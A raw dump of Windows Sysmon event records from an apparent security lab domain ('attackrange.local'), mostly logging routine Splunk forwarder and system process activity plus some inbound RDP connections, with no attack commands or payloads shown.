Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976075Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.438{69CF5F33-87EF-6151-6E79-00000000FD01}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976074Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.281{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B94C8AC33B05A12D7ACE2BF0F02A44DA,SHA256=263A956BD75F49EB86D49B9700FC6EB88ECCBE2173F9518764117C756A3486ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047577Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:28.548{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5C5B710F316CF7850B05D3FAAB02D7C,SHA256=F4024B4806879DA318A367FEA5039C44FE4DDD1BD87AAC50667C0266DB4EA68D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976119Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.844{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-87F0-6151-7079-00000000FD01}348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976118Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.844{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976117Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.844{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976116Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.844{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976115Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.844{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976114Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.844{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976113Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.844{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976112Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.844{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976111Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.844{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976110Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.844{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976109Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.844{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-87F0-6151-7079-00000000FD01}348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976108Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.828{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-87F0-6151-7079-00000000FD01}348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976107Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.829{69CF5F33-87F0-6151-7079-00000000FD01}348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976106Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.484{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0DB1AFE94262D35785A91C2F03AA1CA8,SHA256=18125E21F326BE1DC758A9C4B5BDFFF6651569BFE661E2DDC2015ABA026A2E88,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976105Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:24.766{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de59689-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976104Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:24.478{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60143-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976103Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:24.140{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-3964-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000976102Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.359{69CF5F33-87F0-6151-6F79-00000000FD01}16163652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976101Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.156{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-87F0-6151-6F79-00000000FD01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976100Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.156{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976099Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.156{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976098Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.156{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976097Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.156{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976096Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.156{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976095Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.156{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976094Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.156{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 